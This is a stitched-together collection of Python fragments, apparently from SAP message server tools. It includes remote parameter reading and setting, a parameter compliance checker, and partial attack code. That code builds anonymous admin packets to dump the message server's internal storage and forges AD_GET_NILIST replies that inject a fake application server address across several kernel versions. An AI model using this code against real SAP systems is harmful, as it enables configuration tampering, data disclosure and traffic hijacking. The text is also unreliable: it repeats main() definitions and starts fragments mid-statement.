def do_parameter_get(self, args): """ Get parameter value. Options: <parameter name> """ parameter_name = args # Send ADM AD_PROFILE request adm = SAPMSAdmRecord(opcode=0x1, parameter=parameter_name) p = self._build(0x04, 0x05, adm_records=[adm]) response = self.connection.sr(p)[SAPMS] if response: self._print("Parameter value: %s" % response.adm_records[0].parameter)
def do_parameter_set(self, args): """ Set parameter value (requires monitor mode enabled). Options: <parameter name> <parameter value> """ try: parameter_name, parameter_value = args.split(" ", 2) except ValueError: self._error("Invalid parameters !") return # Send ADM AD_SHARED_PARAMETER request adm = SAPMSAdmRecord(opcode=0x2e, parameter="%s=%s" % (parameter_name, parameter_value)) p = self._build(0x04, 0x05, adm_records=[adm]) response = self.connection.sr(p)[SAPMS] if response: if response.adm_records[0].errorno != 0: self._error("Error changing the parameter !") else: self._print("Parameter %s set to %s !" % (parameter_name, parameter_value))
def main(): options = parse_options() if options.verbose: logging.basicConfig(level=logging.DEBUG) domain = ms_domain_values_inv[options.domain] # Initiate the connection conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host, options.remote_port, options.route_string, base_cls=SAPMS) print("[*] Connected to the message server %s:%d" % (options.remote_host, options.remote_port)) client_string = options.client # Build MS_LOGIN_2 packet p = SAPMS(flag=0x00, iflag=0x08, domain=domain, toname=client_string, fromname=client_string) # Send MS_LOGIN_2 packet print("[*] Sending login packet") response = conn.sr(p)[SAPMS] print("[*] Login performed, server string: %s" % response.fromname) server_string = response.fromname print("[*] Retrieving current value of parameter: %s" % options.param_name) # Send ADM AD_PROFILE request adm = SAPMSAdmRecord(opcode=0x1, parameter=options.param_name) p = SAPMS(toname=server_string, fromname=client_string, version=4, flag=0x04, iflag=0x05, domain=domain, adm_records=[adm]) print("[*] Sending packet") response = conn.sr(p)[SAPMS] if options.verbose: print("[*] Response:") response.show() param_old_value = response.adm_records[0].parameter print("[*] Parameter %s" % param_old_value) # If a parameter change was requested, send an ADM AD_SHARED_PARAMETER request if options.param_value: print("[*] Changing parameter value from: %s to: %s" % (param_old_value, options.param_value)) # Build the packet adm = SAPMSAdmRecord(opcode=0x2e, parameter="%s=%s" % (options.param_name, options.param_value)) p = SAPMS(toname=server_string, fromname=client_string, version=4, iflag=5, flag=4, domain=domain, adm_records=[adm]) # Send the packet print("[*] Sending packet") response = conn.sr(p)[SAPMS] if options.verbose: print("[*] Response:") response.show() if response.adm_records[0].errorno != 0: print("[*] Error requesting parameter change (error number %d)" % response.adm_records[0].errorno) else: print("[*] Parameter changed for the current session !")
def main(): options = parse_options() if options.verbose: logging.basicConfig(level=logging.DEBUG) # initiate the connection : print("[*] Initiate connection to message server %s:%d" % (options.remote_host, options.remote_port)) try: conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host, options.remote_port, options.route_string, base_cls=SAPMS) except Exception as e: print(e) print( "Error during MS connection. Is internal ms port %d reachable ?" % options.remote_port) else: print("[*] Connected. I check parameters...") client_string = options.client # Send MS_LOGIN_2 packet p = SAPMS(flag=0x00, iflag=0x08, toname=client_string, fromname=client_string) print("[*] Sending login packet:") response = conn.sr(p)[SAPMS] print("[*] Login OK, Server string: %s\n" % response.fromname) server_string = response.fromname try: with open(options.file_param) as list_param: for line in list_param.readlines(): line = line.strip() # Check for comments or empty lines if len(line) == 0 or line.startswith("#"): continue # Get parameters, check type and expected value # param2c = the SAP parameter to check # check_type = EQUAL, SUP, INF, REGEX, <none> # value2c = the expect value for 'ok' status (param2c, check_type, value2c) = line.split(':') status = '[!]' # create request adm = SAPMSAdmRecord(opcode=0x1, parameter=param2c) p = SAPMS(toname=server_string, fromname=client_string, version=4, flag=0x04, iflag=0x05, adm_records=[adm]) # send request respond = conn.sr(p)[SAPMS] value = respond.adm_records[0].parameter.replace( respond.adm_records[0].parameter.split('=')[0] + '=', '') # Verify if value match with expected value if value == '': value = 'NOT_EXIST' status = '[ ]' elif check_type == 'EQUAL': if value.upper() == str(value2c).upper(): status = '[+]' elif check_type == 'NOTEQUAL': if value.upper() != str(value2c).upper(): status = '[+]' elif check_type == 'REGEX': if re.match(value2c.upper(), value.upper()) and value2c != 'NOT_EXIST': status = '[+]' elif check_type == 'SUP': if float(value) >= float(value2c): status = '[+]' elif check_type == 'INF': if float(value) <= float(value2c): status = '[+]' else: status = '[ ]' # display result print("%s %s = %s" % (status, param2c, value)) except IOError: print("Error reading parameters file !") exit(0) except ValueError: print("Invalid parameters file format or access denied!") exit(0)
hwid=struct.pack("!I", os.getpid())) # ADM STRG_TYPE_READALL_OFFSET_I # will dump the content of the file: # /usr/sap/SID/ASCS01/work/SID_msg_server_adtl_storage p_adm_readall_i = SAPMS( fromname=my_name, toname=anon_name, flag='MS_ADMIN', iflag='MS_ADM_OPCODES', key=null_key, # TODO: CHANGE THAT AT RUNTIME (previous key + 6) adm_recno=1, adm_records=[ SAPMSAdmRecord(opcode='AD_RZL_STRG', rzl_strg_type='STRG_TYPE_READALL_OFFSET_I', rzl_strg_name=' ', rzl_strg_uptime=7353, rzl_strg_delay=290, rzl_strg_integer3=7353) ]) p_adm_readall_ofs = SAPMS(fromname=my_name, toname=anon_name, flag='MS_ADMIN', iflag='MS_ADM_OPCODES', key=null_key, adm_recno=1, adm_records=[ SAPMSAdmRecord( opcode='AD_RZL_STRG', rzl_strg_type='STRG_TYPE_READALL_OFFSET', rzl_strg_name=' ')
fromname=anon_name, flag=0, iflag='MS_LOGOUT', padd=0) p_adm_readall_i = SAPMS(fromname=my_name, toname=anon_name, flag='MS_ADMIN', iflag='MS_ADM_OPCODES', key=null_key, adm_recno=1, adm_records=[ SAPMSAdmRecord( opcode='AD_RZL_STRG', rzl_strg_type='STRG_TYPE_READALL_OFFSET_I', rzl_strg_name=' ', rzl_strg_uptime=7353, rzl_strg_delay=290, rzl_strg_integer3=7353) ]) p_adm_readall_ofs = SAPMS(fromname=my_name, toname=anon_name, flag='MS_ADMIN', iflag='MS_ADM_OPCODES', key=null_key, adm_recno=1, adm_records=[ SAPMSAdmRecord( opcode='AD_RZL_STRG', rzl_strg_type='STRG_TYPE_READALL_OFFSET', rzl_strg_name=' ')
def ms_adm_nilist(p, whos_asking): print "[+] " + yellow( "Generating AD_GET_NILIST_PORT answer for request with key", bold=True) + " '%s'" % p.key.encode('hex') fromname = str() toname = str() answer = 1 # extract info from key foo, key_t, key_u, key_respid = struct.unpack('!BBHL', p.key) fromname = my_name toname = p.fromname key = p.key flag = 'MS_REPLY' opcode_version = 5 adm_type = 'ADM_REPLY' rec = ' ' * 100 recno = 0 records = None r = SAPMS(toname=toname, fromname=fromname, key=key, domain='ABAP', flag=flag, iflag='MS_SEND_NAME', opcode='MS_DP_ADM', opcode_version=p.opcode_version, opcode_charset=p.opcode_charset, dp_version=p.dp_version, adm_recno=recno, adm_type=adm_type, adm_records=records) ############################### # 745 KERNEL and sometime 742 # ############################### # why "sometime" for 742? # they have both programs, old "RSMONGWY_SEND_NILIST" and new "RGWMON_SEND_NILIST" # they both use dp_version=13, but IP list format expected in the ADM layer is a # bit different between both programs. if p.dp_version == 13: r.adm_recno = 4 if 'RSMONGWY_SEND_NILIST' in whos_asking: r.adm_records = [ SAPMSAdmRecord(opcode='AD_SELFIDENT', record=rec, serial_number=0, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST', record=ms_adm_build_old_ip_record("127.0.0.1"), serial_number=0, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST', record=ms_adm_build_old_ip_record("127.0.0.2"), serial_number=1, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST', record=ms_adm_build_old_ip_record( fake_as["ip"]), serial_number=2, executed=answer) ] else: r.adm_records = [ SAPMSAdmRecord(opcode='AD_SELFIDENT', record=rec, serial_number=0, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT', record=ms_adm_build_ip_record("127.0.0.1"), serial_number=0, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT', record=ms_adm_build_ip_record("127.0.0.2"), serial_number=1, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT', record=ms_adm_build_ip_record(fake_as["ip"]), serial_number=2, executed=answer) ] r.dp_info1 = SAPDPInfo1( dp_req_len=452, dp_req_prio='MEDIUM', dp_type_from='BY_NAME', dp_fromname=my_name, dp_agent_type_from='DISP', dp_worker_from_num=p.dp_info1.dp_worker_to_num, dp_addr_from_t=p.dp_info1.dp_addr_from_t, dp_addr_from_u=p.dp_info1.dp_addr_from_u, dp_addr_from_m=0, dp_respid_from=p.dp_info1.dp_respid_from, dp_type_to='BY_NAME', dp_toname=p.fromname, dp_agent_type_to='WORKER', dp_worker_type_to='DIA', dp_worker_to_num=p.dp_info1.dp_worker_from_num, dp_addr_to_t=p.dp_info1.dp_addr_from_t, dp_addr_to_u=p.dp_info1.dp_addr_from_u, dp_addr_to_m=p.dp_info1.dp_addr_from_m, dp_respid_to=p.dp_info1.dp_respid_from, dp_req_handler='REQ_HANDLER_ADM_RESP', dp_blob_worker_from_num=p.dp_info1.dp_worker_from_num, dp_blob_addr_from_t=p.dp_info1.dp_addr_from_t, dp_blob_addr_from_u=p.dp_info1.dp_addr_from_u, dp_blob_respid_from=p.dp_info1.dp_blob_respid_from, dp_blob_dst=(' ' * 35).encode('UTF-16-BE')) ############## # 720 KERNEL # ############## # Here we use old IP list format # and a much simpler DP layer if p.dp_version == 11: r.adm_recno = 4 r.adm_records = [ SAPMSAdmRecord(opcode='AD_SELFIDENT', record=rec, serial_number=0, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST', record=ms_adm_build_old_ip_record("127.0.0.1"), serial_number=0, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST', record=ms_adm_build_old_ip_record("127.0.0.2"), serial_number=1, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST', record=ms_adm_build_old_ip_record(fake_as["ip"]), serial_number=2, executed=answer) ] r.dp_info2 = SAPDPInfo2(dp_req_prio='MEDIUM', dp_blob_14=p.dp_info2.dp_blob_14, dp_name_to=p.fromname, dp_addr_from_t=255, dp_blob_09='\xff\xcc', dp_blob_10='\x01\x00', dp_addr_from_u=0, dp_addr_from_m=0, dp_addr_to_t=key_t, dp_addr_to_u=key_u, dp_addr_to_m=0, dp_respid_to=key_respid, dp_blob_19=1, dp_blob_21=105) ############## # 749 KERNEL # ############## # That's use on latest kernel like S4HANA servers if p.dp_version == 14: r.adm_recno = 4 r.adm_records = [ SAPMSAdmRecord(opcode='AD_SELFIDENT', record=rec, serial_number=0, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT', record=ms_adm_build_ip_record("127.0.0.1"), serial_number=0, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT', record=ms_adm_build_ip_record("127.0.0.2"), serial_number=1, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT', record=ms_adm_build_ip_record(fake_as["ip"]), serial_number=2, executed=answer) ] r.dp_info3 = SAPDPInfo3(dp_req_len=348, dp_req_prio='MEDIUM', dp_type_from='BY_NAME', dp_fromname=my_name, dp_agent_type_from='DISP', dp_worker_from_num=p.dp_info3.dp_worker_to_num, dp_addr_from_t=p.dp_info3.dp_addr_from_t, dp_addr_from_u=p.dp_info3.dp_addr_from_u, dp_addr_from_m=0, dp_respid_from=p.dp_info3.dp_respid_from, dp_type_to='BY_NAME', dp_toname=p.fromname, dp_agent_type_to='WORKER', dp_worker_type_to='DIA', dp_worker_to_num=p.dp_info3.dp_worker_from_num, dp_addr_to_t=p.dp_info3.dp_addr_from_t, dp_addr_to_u=p.dp_info3.dp_addr_from_u, dp_respid_to=p.dp_info3.dp_respid_from, dp_padd25=1, dp_req_handler='REQ_HANDLER_ADM_RESP', dp_padd29=p.dp_info3.dp_padd29, dp_padd30=p.dp_info3.dp_padd30, dp_padd31=p.dp_info3.dp_padd31, dp_padd32=p.dp_info3.dp_padd32) open("/tmp/dp.bin", "wb").write(str(SAPNI() / r)) return r